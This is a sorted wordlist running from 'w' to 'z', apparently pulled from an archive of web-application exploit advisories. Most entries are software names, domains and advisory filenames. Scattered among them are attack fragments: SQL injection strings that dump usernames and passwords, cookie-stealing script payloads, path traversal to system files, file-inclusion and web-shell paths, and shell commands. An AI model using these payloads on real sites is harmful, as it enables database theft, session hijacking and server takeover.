window_top.php?theme_file=[ShELL]
winducms
windyroad.org
w_inicial.php
win.ini
win.ini%00
win.ini%00.jpg
winner.php?lang=[LFI]
winners.php?gid=170+and+31337-31337=0+--+
winners.php?theme=..
winners.php?year=2008&type=Special'
winn-guestbook
Winn-Guestbook[php]
winnt
winnt&folder=....
winroute.ru
wired-security.net
 with
 with any site that is vulnerable to SQL injection.
withdraw?account=bob&amount=1000000&for=mallory"<
withdraw_money.php?a=cancel&id=[sqli]
> (without http,www and trailing slash)<br 
[without php extention]
 with the link of script it's very importenet
 with the link of script it's very importent
* with this example remote attacker changes password of 1st user of LDU to 123456 
* with this example remote attacker changes password of 1st user of Seditio to 123456 
 with your web browser"
witshare
wizard
Wizard
wizmall01
_wk
wk_lang.php?WK[wkPath]=[evil_scripts]
wlinks
wls_eintrag
wls_v1.3se
wmcomments.php?act=vi&CmID=2&ArtID="><script>alert(
wmt
wmview.php?ArtCat="><script>alert(
wolfcms
Wolf_CMS )
<wolfcms_ip>:80
_woliocms
wordpress
wordpress\""
">WordPress<
[WORDPRESS]
wordpress.2.1.3
wordpress-3-3-1-multiple-csrf-vulnerabilities
wordpress-3.5.1
wordpress-advisory.html
wordpress-automatic-plugin
wordpress-calendar.html
wordpress-catalog.html
wordpress.designpraxis.at
wordpress-donation-plugin-with-goals-and-paypal-ipn-by-nonprofitcmsorg
Wordpress.html
<wordpress_ip>:80
wordpress.localhost:8080
wordpress-mu-options-overwrite.html
wordpress.org
wordpress.org\
wordpress_path
wordpress-plugin-comment-rating
wordpress-plugin-jquery-drop-down-mega-menu-widget
wordpress-plugins
wordpress-themes
wordpress-vulnerability
wordpress-wp-e-commerce-plugin
/?words=&#039;[SQL]
/?words=%27[SQL]&where=1
/?words=%3Cscript%3Ealert(
work
workbench
workbench.sourceforge.net
workDB
workdone.php?video=1&id=..
workitem
work_order_add_finished.php
work_order_issue.php
workshop
workspace.php?cct_base= [inj3ct0r sh3ll]
workspaces.php?sShare=..
worksystem
worksystem.sourceforge.net
worldcalendar
wotw_5.0_en
wotw.altervista.org
wow
wowbb
wp
wp ...
[WP]
wp1072278.vwp3485.webpack.hosteurope.de
wp342
wp351
wp-admin
wp admin 1 "id;uname -a;pwd;uptime"
wp-audio-gallery-playlist
wp-automatic
wp-autoyoutube
wp-bannerize
wp-cal
wp-comment-remix
wp-comments-post.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L]
wp-config.php
*wp-content
wp-content
wp-cumulus
wp-cumulus.php
wp-custom-pages
wpdev-booking.php
wpdev-booking.phpwpdev-booking-reservation
wpdev-booking.phpwpdev-booking&wh_booking_id=4&view_mode=vm_listing&tab=actions
wpdev-booking.phpwpdev-booking&wh_booking_id=6&view_mode=vm_listing&tab=actions
wp-download.php?dl_id=[SQL]
wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
wp-ds-faq
wpeasystats
wp-e-commerce
wpfb-ajax.php?action=tree&base=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20&root=source
wp-filebase
wp-filemanager
wpf-insert.php
wpforum
wp-forum
wp-glossary
wp-gpx-maps
wp-gpx-maps_admin_tracks.php
wp-gpx-maps_admin_tracks.php?realGpxPath=.&target_path=.&gpxRegEx=
wphpbb.cgi
&w=[ PHPCODE ]
&w=phpinfo();
wpids-version-012-released
wp-login.php
wp-login.php?action=register
wp-login.php?action=rp&key[]=
wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
wp-lytebox
wpmarketplace
wp-marketplace
wp-menu-creator
wp_nonce_field
wportfolio
[wp path]
WP_PATH
wp-photo-album-plus
wp-plugins
wp-pma-mod and you will be presented with the full portable-phpMyAdmin web interface without the requirement of a session or any credential.
wp-polls
wp-polls.html
wp-polls.php");
wp-property
wpQuiz-41098.html
wp-sendsms
wp-settings.php
wpsf-js.php][GET][id=-1][CURRENT_USER()
wpsf-js.php][GET][id=-1][MID((VERSION()),1,6)
wpsf-js.php][GET][id=-1][SELECT (CASE WHEN ((SELECT super_priv FROM
wpsf-js.php?id=1
wp-simplemail
wp-spamfree
wpSS
wpstorecart
wp-symposium
wp-syntax
wptitans
wp-topbar
wptouch
wp-trackback.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L]
wp_users%23
wrappers.ftp.php
wrappers.http.php)
writemessage.php?original=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8+from+users--
write.php?edit=[ARTICLE ID]
write.php?id=%s&page=1&sn1=&divpage=1&
write.php?logout=user
write.php?new=entry
write.php?publish=[ARTICLE ID]&action=0
write.php?publish=[ARTICLE ID]&action=1
write_review.php?modelid=13'[SQL]
Writer.php?bkpwp_plugin_path=Shl3?
ws
ws.apache.org
/?wsid=32174
wsk
wsk.php?wsk=[-Sh3ll-]
wsnclassifieds
wsnforum
wsnguest
wsnlinks
wsnlinks_members
wsn-links-sql-injection-vulnerability-cve-2010-4006
wtb0j6.png
wush.net
wwe.hostwq.net  
wwh
wwh-0.3.9.7z
') $www = '';
WwW.4RxH.CoM
Www.asb-may.net
WwW.IQ-ty.CoM>
WwW.IQ-TY.CoM>
WwW.IQ-ty.CoM>   < IQ-Security
WWW.NEWURL.C
WwW.Sa-ViRuS.CoM">WwW.Sa-ViRuS.CoM<
WwW.Sec-Code.CoM
WWW.Site.Com
WwW.SoQoR.NeT
WwW.SoQoR.NeT                     #
Www.Tryag.Com
Www.Victim.Com
 , www.xoops.org
wysgui
wysiwyg
wysiwyg_editor
wysiwyg.php?language=[LFI]%00
x
x"
X
x10_mirco_blogging_v121
x2
x%20|
x3
x7chat
X7Chat
x7path
x86
xajax_functions.php?mosConfig_absolute_path=[evilcode]
xaker.name              __.
xaknet.ru
xampp
xamppsecurity.php
xampp-windows.html
xanatos.glo.org.mx
Xanthia_cache
xblc
xc0r3.net
xcart
xcloner-backup-and-restore
XCloner.php?
XCloner.php?task=info
XCloner.php?task=step2&output_path=[path]
xcms
xcode.or.id";<
xcontroller
xd
xecms.sunsite.dk
xenuser.org
[XE_PATH]
xfcontent
xfdb
xfmod
xforce
xforce.iss.net
xforum
x-forum
xfsection
xGB.php?act=admin&do=edit
xGB.php?act=admin&do=edit 
xguestbook.rar
xhr2
xhresim
xhtml">
xhtml1
xhtml1-transitional.dtd">
xhtml1-transitional.dtd">  <html>  <head>  <meta http-equiv="Content-Type" content="text
xhtml" dir="ltr">
xhtml" xml:lang="<? echo _("fr"); ?>">
x.htm" [PERSISTENT SCRIPT CODE])'
x-httpd-php
x-httpd-php" directive we have
x-httpd-php\\r\\n\\r\\n";
x-httpd-php\r\n\r\n"
Xibo-Directory-Traversal-Vulnerability-(DS-2013-00
xibo.org.uk
x-icon">
x_image.php?type=background' method=post enctype=multipart
Xinha
xivo
XiVO_1.1-Gallifrey
xivo-skaro.git;a=commit;h=127ab43e6d8e8ed94f16ff388fb62fd611a40e19
x.js%3E%3C
xkiosk.net
xlaabsolutecp
xlaabsolutepm
xlate
xlite_profiles
xlrstats
xLyg0zckZS
xmap
xmb18sp2
XMBforum
xmedien.e-ee.de
xml
xml2owl
xml2rss.php?PROJECT_ROOT=[Evil_Script]
xml_archief
xml_fetch.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
xmlns
xmlOutput
xmlparser.php?gfwww=[Shell]
xml.php
xml.php?act=add_loc&sel=1
xml.php?dcTema=";
xml.php?dcTema=1'+AND+1=0
xml.php?dcTema=1'+AND+1=1
xml.php?fantasticopath=
xml.php?madsTema=2'+and+1=0
xml.php?madsTema=2'+and+1=1
xml.php?page=cat&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13#--
xml.php?skosTema=2'+AND+1=0
xml.php?skosTema=2'+AND+1=1
xml.php?xtmTema=2'+AND+1=0
xml.php?xtmTema=2'+AND+1=1
xml.php?zthesTema=2'+AND+1=0
xml.php?zthesTema=2'+AND+1=1
xmlrpc
xmlrpc.php
xmlrpc.php \n";
xmlrpc.php -n admin
xmlrpc.php -n Alexxus
xmlrpcserver"); 
xml_rssparse.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
xml_zone_data.php?filter=1%20union%20select%20concat(0x0a,user,0x3a,pass,0x3a,0x0a)%20from%20users" | grep ":" | sort -u
xmors.by.ry
xmovie-component
 - XMS is an online visual web development enviroment and framework, providing a web application base, with multi language support, based on XML.
[x_news_path]
xNews.php?act=shownews&id=[SQL]
xnlegacies
xnova.fr
xo
xoda
xoda-0.4.5
xodadir
xoda.org
xomol
xoops
xoops-2.0.18
xoops-2.5.4
xoopseditor
xoopsimagebrowser.php" method="post">
xoopsimagebrowser.php?target=1" method="post">
xoopsimagemanager
 - XOOPS is a web application platform written in PHP for the MySQL database. Its object orientation makes it an ideal tool for developing small or large community websites, intra company and corporate portals, weblogs and much more.
xoops_lib
/?xoopsOption[pagetype]=..
xoops.org
xoops.org                                             *           
xoops.org\n";
xoops.pr.gov.br
xoops.svn.sourceforge.net
xoops_users
xoops?view=rev&revision=1282
xoron.biz
xp10
xp10.me
x.php%60 %3f>
x.php","x=1&z=2"));
xpl
xpl.gif&cmd=";
xporce.php
xppubwiz.php
xpweb
XPWeb_v3.3.2.tgz
Xr0b0t
xraycms
xrayoptics.by.ru
XRDS.php?_ENV[asicms][path]=
XRI.php?_ENV[asicms][path]=
XRIRes.php?_ENV[asicms][path]=
xscripts
xsk_16.jpg [colorScheme parameter]
xsrf_csrf_in_bedita.html
xsrf_csrf_in_blogcms.html
xsrf_csrf_in_bxr.html
xsrf_csrf_in_cambio.html
xsrf_csrf_in_cmscout.html
xsrf_csrf_in_diafan_cms.html
xsrf_csrf_in_diamondlist.html
xsrf_csrf_in_e107.html
xsrf_csrf_in_f3site.html
xsrf_csrf_in_feng_office.html
xsrf_csrf_in_frog_cms.html
xsrf_csrf_in_lotuscms.html
xsrf_csrf_in_npds_revolution.html
xsrf_csrf_in_open_blog.html
xsrf_csrf_in_phpcollab.html
xsrf_csrf_in_phpdug.html
xsrf_csrf_in_php_microcms.html
xsrf_csrf_in_vam_shop.html
xsrf_csrf_in_whcms.html
xsrf_csrf_in_wolf_cms.html
xsrf_csrf_in_zomplog.html
xtAdmin
xtc_304SP21
XT-Commerce
xtcommerce-v304-sp21
xt_conteudo
xt_counter.php?server_base_dir=[evil_code]
[XtremeNews_path]
xwiki
x-www-form-urlencoded")
x-www-form-urlencoded");
x-www-form-urlencoded"})
x-www-form-urlencoded" method="POST" id="xml">
x-www-form-urlencoded\r\n";
x-www-form-urlencoded\r\nContent-Length: ".length($data)."\r\n\r\n$data\r\n";
x-www-form-urlencoded\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
x-www-form-urlencoded\r\nUser-Agent: Mozilla
xx
xx_byalbayx.php
xx.php
xxx
xxx.dk
xxx.net
xxx.org
xxx"><script>alert(document.domain)<
xxx_shell.php
xxx&t=js
xxxx
x.x.x.x
xxxx"; width="100%"
xxxxx
xxxxxxx
XXXXXXX
xxxxxxxx
xxxx.xxxx.edu
xxxxxxx?xsd=..
xxx.xxx.xxx
xxx.xxx.xxx.xxx
XXX.XXX.XXX.XXX
[xyz]
XZCl4.95.11.rar
xzero-community-classifieds-v4-95-11-lfi-sql-in-t9394.rst
y
[y0urh0st]
Y0urSh3LL?
*&y=2007
y3dips.echo.or.id
yaap.oskbraniewo.pl
yabb2
yabbse
 yabbse_ 1
yabbse154
yabbtest.spikecity.net
yabsoft.info
yacomas
yacomas.sourceforge.net
yacs
yad-admin
Yadis
yadoy666.serverisdown.org
yahooanswers
yahzee.ya.funpic.de
yamamah
yamamah_v1
yapbb.sourceforge.net
yapig-0.92b"
yapig.sourceforge.net
yaplap
[yaplap]
yappa-ng
yappa-ng         
yappa-ng_demo
yappa-ng_main_eng.html      |
[yappa-ng-path]
yarivgiladi
yashodha
yaxal_products.php?display=product&id=66
yblog
y-blog
ycl.sch.id
ydframework
[year]
year2005.php?id=[id number][SQL]
*&year=2009
yearcal.php?ycyear=<script>alert(document.cookie)<
/?year=kaMtiEz&month=tukulesto&mday=-15+union+all+select+@@version,user()--
/?year=kaMtiEz&month=tukulesto&mday=[INDONESIANCODER]
year.php?catid=-4+union+select+0,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1),2
year.php?gfplugins=[Shell]
yeast_profiles.list.php
yeAx0.png
yehg.net
yehg.net, YGN
yehg.net, YGN Ethical Hacker Group>
yehg.net, YGN Ethical Hacker Group, Myanmar.
yellow_images
yerba
yfs
yii-framework-search-sql-injection.html
yj-contact-us-enhanced-joomla-contact-form-2.html
yogurt
yogyacarderlink.web.id
yogyacarderlink.web.id )
 [Yol] 
yolink-search
yonetici
yonetim
yonetim |
yonetim2
yopy_sync.php?download_file=0&filename=..
yopy_upload.php
you.are.redir
(youfile)
 ( you look here and see shell 1226242317_logo_c.php )
 ( you look here and see shell 1226242993_offer_c.php )
 ( you look here and see shell 1226243945_logo_c.php )
your
Your_Account
[your account's user id]
yourauctions_p.php">
yourauctions_p.php" 
Your_Backdoor.php
YOURCOBALTBOX:444
[Your Directory]
[yourdomain]
your.evil.server.tdl
yourfile.extension <= here
[your_file]  <=- file will be uploaded here
your_file.php.png<
YOUR_FILE \r\n";
[yourh0st]
yourhost
YOURHOST
[YOUR_HOST]
yourid
yourindex.html"<
(your name )
(your name)?cmd=uploadform (use temper data)
[your_nickname]_[filename].[ext]
your_orders.php?cat_id="><script>document.write(document.cookie)<
yourscript
yourscript? and get RFI.
yourscript.php?
yourserver
[your server]
yourshell
[yourshell]?&	
YourShell?&
yourshell.asp                 #
yourshell.asp ==>>> your address
your_shell_filename.php
yourshell.php
yourshell.php                                 #
YouRShell.php
 (Your Shell.php.giff)
yoursite
[yoursite]
yoursite.org
[your uploaded file]
[youruser]
YourUsername
[your_username].jpg\0
yourweb
yourwebsite.de
youshell.php.jpg
youtu.be
youtubeblog
youtubeclone
youwebsite
yoxel
[yoxel_v1.23beta]
yozgat.us
ypelaton_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
yproion_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
yrch
ysearch
y-shahinzadeh.ir
y-shahinzadeh.ir }
y-shahinzadeh.ir & ha.cker.ir
y-shahinzadeh.ir ',"\n";
ytb
yui-menu.php?page=..
yui-menu.tpl.php?uri=..
YUI-upload
[YYYY]
z
\z
z00
z1exchange
z1xem
Z8bYM.png
zabbix
zabbix181api.pl-poc
ZABBIX%20Latest%20Stable
zaehler.php?i=5
zahlung.php?Modus=Detail&ID=1+AND+0+UNION+ALL+SELECT+1,version()
zaz.php?cmd=$cmd");
zb41pl7
zblog
zBlog
zboard
zboard.php?
zboard.php?id=gallery&sn1=ALBANIAN%20RULEZ='%3E%
zboard.php?id=link&page=ALBANIAN%
zboard.php?id=%s\n", zb_host, zb_dir, 
zboard.php?id=%s\n", zb_host, zb_dir, zb_tid);
zboard.php?id=test
zboard.php?id=test 
zboard.php?id=test";
zboard.php\r\n"
ZBX-4385
ZbX50qaZ
ZBX-5348
zcat.php?id=-1+union+select+1,2,concat(user,char(58),pass),4,5+from+user
zcat.php?id=-64+union+select+1,2,concat%28user,char%2858%29,pass%29,4,5+from+user
zcat.php?id=[N.A.S.T ]
ZDI-10-118' ],
ZDI-12-090' ],
ZDI-12-091' ],
zdjecia
zebigbrozer.free.fr
zebrafeeds
ZEEJOBSITE-v2.0.html
ZEELYRICS-v2.0.html
zeematri-v3.0.html
zeldaforums.net]     |
zen
zenas.org
zendframework
zend_hash_del_key_or_index_vulnerability.html
zenpage-default-full.js.php?locale=<
zenphoto
zen-photo";  
zenphoto" ."
zenphoto1433
zentimetracking
zentrack
zeroboard
zero-day-vulnerability-in-many-wordpress-themes
zeroidentity.org
zeroidentity.org     |
zeroidentity.org --]
zeroidentity.org - and #zeroidentity
zeroidentity.org\n";
zerostag.free.fr
zero_vote
zeuscart
zeuscms
ZeusCMS%20v0.2
zf2
ZF2012-01
zhaohuan
(.*?))\z#$host=$1 and ($path=$2)=~s
zids.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
Zikou.se
Zikula-1.2.5
zikula.org
zimplit
zimplit.php?action=changeuserpass" method="post">
zimplit.php?action=listAllFiles&file=..
zimplit.php?action=listAllFiles&file=[Directory]
zimplit.php?action=load1&file=..
zimplit.php?action=load1&file=[Path to file]
zimplit.php?action=load1&file=security.php
zimplit.php?action=load&file=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28944002%29%3C%2fScRiPt%3E
zimplit.php?action=new&file=shell.php" width="1" height="1">
zimplit.php?action=save&file=shell.php" method="post">
zina
zingiri-web-shop
zip
Zip
zipball
zipit.php?id='+union+select+1,2,3,4,5,6,7
zip.php?current_dir=..
zip.php?id='+union+select+1,2,3
zirkon
zm
zmagazine
zogo-shop
zomplog
zomplog neo |"
zomplog.zomp.nl
zonamac
zonartm.og
zonartm.org
zone.class.php?path_om=[Shell]
zone_files.php?plan_id=35&domain=[SQL]
zone_files.php?plan_id=[SQL]
zone-h.org
zones.php?page=1&action=new (OR)
zoomstats
zorlu40.php
zorlu40.php ( according to me you dont make hack this site )
zorlu40.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server fena deil )
zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F
zorum_3_5
zorum.phpoutsourcing.com
zotpress
zotpress.rss.php?api_user_id=1&account_type=test&displayImages=true&displayImageByCitationID=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)%23
zpanel
zpanel.php?page=billinginfo
zpanelx
" . "zp-core
zp-core
zp-extensions
ZqPVL
ZSL-2010-4942.php	|
ZSL-2010-4949.php
ZSL-2010-4966.php
ZSL-2010-4967.php
ZSL-2010-4969.php
ZSL-2010-4982.php
ZSL-2010-4983.php
ZSL-2010-4984.php
ZSL-2011-4987.php
ZSL-2011-4988.php
ZSL-2011-4990
ZSL-2011-4992.php
ZSL-2011-4995.php
ZSL-2011-5001.php
ZSL-2011-5002.php
ZSL-2011-5004.php
ZSL-2011-5006.php
ZSL-2011-5007.php  |
ZSL-2011-5010.php
ZSL-2011-5014.php
ZSL-2011-5017.php
ZSL-2011-5019.php
ZSL-2011-5024.php
ZSL-2011-5026.php
ZSL-2011-5027.php
ZSL-2011-5028.php
ZSL-2011-5030.php
ZSL-2011-5031.php
ZSL-2011-5033.php
ZSL-2011-5034.php
ZSL-2011-5036.php
ZSL-2011-5037.php
ZSL-2011-5041.php
ZSL-2011-5042.php
ZSL-2011-5043.php
ZSL-2011-5048.php
ZSL-2011-5051.php
ZSL-2011-5053.php
ZSL-2011-5055.php
ZSL-2011-5064.php
ZSL-2011-5065.php
ZSL-2012-5075.php
ZSL-2012-5077.php
ZSL-2012-5081.php
ZSL-2012-5086.php
ZSL-2012-5091.php
ZSL-2012-5092.php
ZSL-2012-5098.php
ZSL-2012-5099.php
ZSL-2012-5102.php
ZSL-2012-5104.php
ZSL-2012-5106.php
ZSL-2012-5109.php
ZSL-2012-5113.php
ZSL-2013-5122.php
ZSL-2013-5123.php
ZSL-2013-5126.php
ZSL-2013-5127.php
ZSL-2013-5130.php
ZSL-2013-5131.php
ZSL-2013-5132.php
ZSL-2013-5133.php
ZSL-2013-5134.php
ZSL-2013-5136.php
ZSL-2013-5137.php
ZSL-2013-5138.php
ZSL-2013-5145.php
ZSL-2013-5148.php
ZSL-2013-5149.php
ZSL-2013-5150.php
ZSL-2013-5153.php
ZSL-2013-5154.php
[ztml]
zubehoer
zv
zvonnews
z-vote
/?zvote=SQL_CODE_HERE
zwii
ZykeCMSV1.0
ZykeCMSV1.1
zyxware
Zyxware-Health-Monitoring-System
ZZ_Templater
